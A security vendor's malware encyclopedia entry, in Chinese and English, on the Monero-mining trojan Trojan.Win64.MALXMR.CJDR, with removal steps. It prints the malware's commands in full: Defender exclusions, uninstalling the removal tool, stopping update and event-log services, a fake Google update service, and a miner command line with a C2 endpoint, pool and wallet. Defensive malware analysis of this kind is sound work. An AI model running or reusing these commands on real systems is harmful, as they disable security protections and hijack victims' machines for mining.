Trojan.Win64.MALXMR.CJDR

感染途徑: 从互联网上下载, 下载了其他恶意软件

它以文件的形式出现在系统中，可能是其他恶意软件投放的，或者是用户在访问恶意网站时无意中下载的。

它會新增類似合法應用程式的服務，讓使用者誤以為它們是合法的。

它连接到某个网站，发送和接收信息。

文件大小: 817833480 bytes

报告日期: EXE

内存驻留: 是的

初始樣本接收日期: 2024年10月28日

Payload: 连接到 URL/Ip, 植入文件, 修改系统注册表

新病毒详细信息

它以文件的形式出现在系统中，可能是其他恶意软件投放的，或者是用户在访问恶意网站时无意中下载的。

安装

它使用不同的文件名在下列文件夹中植入自身的副本：

%ProgramData%\Google\Chrome\updater.exe

它添加下列进程：

powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force → adds the user profile and program data directories to the exclusion list for Windows Defender to bypass scanning specific folders and .exe files.
cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart → quietly uninstalls the Microsoft Malicious Software Removal Tool (KB890830) without restarting the computer.
c.exe stop UsoSvc → stops the Update Orchestrator Service, which manages Windows Updates
sc.exe stop WaaSMedicSvc → stops the Windows Update Medic Service, which ensures the proper functioning of Windows Update components
sc.exe stop wuauserv → stops the Windows Update service to halt automatic updates
sc.exe stop bits → stops the Background Intelligent Transfer Service, used by Windows Update for downloading updates
sc.exe stop dosvc → stops the Delivery Optimization service, which handles peer-to-peer update sharing
powercfg.exe /x -hibernate-timeout-ac 0 → disables the hibernate timeout for computers on AC power
powercfg.exe /x -hibernate-timeout-dc 0 → disables the hibernate timeout for computers on battery power
powercfg.exe /x -standby-timeout-ac 0 → disables the standby timeout for computers on AC power
powercfg.exe /x -standby-timeout-dc 0 → disables the standby timeout for computers on battery power
sc.exe delete "GoogleUpdateTaskMachineQC" → deletes existing service named "GoogleUpdateTaskMachineQC"
sc.exe create "GoogleUpdateTaskMachineQC" binpath= "%ProgramData%\Google\Chrome\updater.exe" start= "auto" → creates a new service that points to the dropped copy of itself
sc.exe stop eventlog → stops the Windows Event Log service
sc.exe start "GoogleUpdateTaskMachineQC" → starts the newly created service.
explorer.exe --algo=rx/0 --url=xmr.2miners.com:12222 --user=86EBNigoaCXSio7ySVmzWpQKwD6L2LAsFFhfZEFbqiivD4n2BdrXF4XKcXAFHLS7hsRcYW3WXpQZqgkWuFR66QeqMx3AV4S --pass=x --cpu-max-threads-hint=20 --cinit-winring=mhhvoejiojwd.sys --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,PLlhDBWxRt.exe,GPU-Z.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe --cinit-api=http://cdnupdateservice.com/api/endpoint.php --cinit-version=3.4.0 --tls --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-id=tjnooobwkhcgvgyn → runs a hidden Monero mining process disguised as a legitimate process and using stealth parameters to avoid detection by various applications

它會新增下列類似合法應用程式的服務，讓使用者誤以為它們是合法的：

Service Name: GoogleUpdateTaskMachineQC
Type: Own process
Binary Path: %ProgramData%\Google\Chrome\updater.exe
Start type: Auto start

其他系统修改

它添加下列注册表项：

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT
DontOfferThroughWUAU = 1 → disables offering Microsoft Removal Tool updates through Windows Update

它修改下列注册表键值:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\wuauserv
Renamed to wuauserv_bkp → results in Windows Update service to stop working

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\BITS
Renamed to BITS_bkp → results in Background Intelligent Transfer Service to stop working

其他详细信息

它添加下列注册表键值:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT

它连接到下列网站，发送和接收信息：

http://{BLOCKED}.{BLOCKED}.{BLOCKED}.251
which redirects to:
- http://{BLOCKED}ateservice.com/api/endpoint.php
{BLOCKED}.{BLOCKED}.{BLOCKED}.184:1222
which redirects to:
- {BLOCKED}ners.com:12222
  which redirects again to:
  - {BLOCKED}ners.com:12222 → mining pool

该程序执行以下操作：

It utilizes binary padding to increase its own file size and evade detection.
It uses up to 20 CPU threads for mining, potentially slowing down the system.
It injects its mining process to explorer.exe and hides itself from detection from the following applications:
- GPU-Z.exe
- perfmon.exe
- ProcessHacker.exe
- procexp.exe
- procexp64.exe
- Taskmgr.exe
- arma3_x64.exe
- arma3.exe
- bf4.exe
- BlackOpsColdWar.exe
- Borderlands2.exe
- Borderlands3.exe
- CK2game.exe
- ck3.exe
- csgo.exe
- Cyberpunk2077.exe
- DeadByDaylight-Win64-Shipping.exe
- EliteDangerous64.exe
- enlisted.exe
- EscapeFromTarkov.exe
- FactoryGame.exe
- Falluot4.exe
- FarCry5.exe
- ffxiv_dx11.exe
- ffxiv.exe
- FIFA21.exe
- FiveM_b2189_GTAProcess.exe
- FiveM_GTAProcess.exe
- FiveM.exe
- FortniteClient-Win64-Shipping.exe
- ForzaHorizon4.exe
- GenshinImpact.exe
- GTA5.exe
- iw6sp64_ship.exe
- League of Legends.exe
- LeagueClientUx.exe
- left4dead2.exe
- Little_Nightmares_II_Enhanced-Win64-Shipping.exe
- ModernWarfare.exe
- NarakaBladepoint.exe
- NarakaBladepoint.exe
- NBA2K21.exe
- NBA2K22.exe
- NMS.exe
- Phasmophobia.exe
- PlanetCoaster.exe
- PointBlank.exe
- PortalWars-Win64-Shipping.exe
- r5apex.exe
- RainbowSix_BE.exe
- RainbowSix.exe
- RDR2.exe
- re8.exe
- RocketLeague.exe
- RogueCompany.exe
- RustClient.exe
- ShooterGame_BE.exe
- ShooterGame.exe
- ShooterGameServer.exe
- SoTGame.exe
- SRTTR.exe
- stellaris.exe
- TEKKEN7.exe
- Tiger-Win64-Shipping.exe
- TslGame.exe
- VALORANT.exe
- VRChat.exe
- Warframe.x64.exe
- WatchDogsLegion.exe
- WorldOfTanks.exe
- zula.exe
- acad.exe
- Adobe Premiere Pro.exe
- AfterFX.exe
- Photoshop.exe
- VideoEditorPlus.exe
- AndroidEmulatorEn.exe
- PLlhDBWxRt.exe
It throttles down CPU usage to 90% if the system is idle.
It uses the following version of XMR mining application:
- 3.4.0
It mines the following cryptocurrency coin:
- Monero (XMR)

最小扫描引擎: 9.800

First VSAPI Pattern File: 19.674.08

VSAPI 第一样式发布日期: 2024年10月25日

VSAPI OPR样式版本: 19.675.00

VSAPI OPR样式发布日期: 2024年10月26日

Step 1

对于Windows ME和XP用户，在扫描前，请确认已禁用系统还原功能，才可全面扫描计算机。

Step 2

注意：在此恶意软件/间谍软件/灰色软件执行期间，并非所有文件、文件夹和注册表键值和项都会安装到您的计算机上。这可能是由于不完整的安装或其他操作系统条件所致。如果您没有找到相同的文件/文件夹/注册表信息，请继续进行下一步操作。

Step 3

重启进入安全模式，然后删除该注册表键值

[ 更多 ]

注意事项：错误编辑Windows注册表会导致不可挽回的系统故障。只有在您掌握后或在系统管理员的帮助下才能完成这步。或者，请先阅读Microsoft文章，然后再修改计算机注册表。

In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\
- GoogleUpdateTaskMachineQC

Step 4

删除该注册表值

[ 更多 ]

注意事项：错误编辑Windows注册表会导致不可挽回的系统故障。只有在您掌握后或在系统管理员的帮助下才能完成这步。或者，请先阅读Microsoft文章，然后再修改计算机注册表。

In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
- DontOfferThroughWUAU = 1

Step 5

删除该注册表键值

[ 更多 ]

注意事项：错误编辑Windows注册表会导致不可挽回的系统故障。只有在您掌握后或在系统管理员的帮助下才能完成这步。或者，请先阅读Microsoft文章，然后再修改计算机注册表。

In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
- MRT

Step 6

搜索和删除该文件

[ 更多 ]

有些组件文件可能是隐藏的。请确认在高级选项中已选中搜索隐藏文件和文件夹复选框，使查找结果包括所有隐藏文件和文件夹。

%ProgramData%\Google\Chrome\updater.exe

Step 7

重启进入正常模式，使用亚信安全产品扫描计算机，检测Trojan.Win64.MALXMR.CJDR文件如果检测到的文件已被亚信安全产品清除、删除或隔离，则无需采取进一步措施。可以选择直接删除隔离的文件。请参阅知识库页面了解详细信息。

概要

技术详细信息

解决方案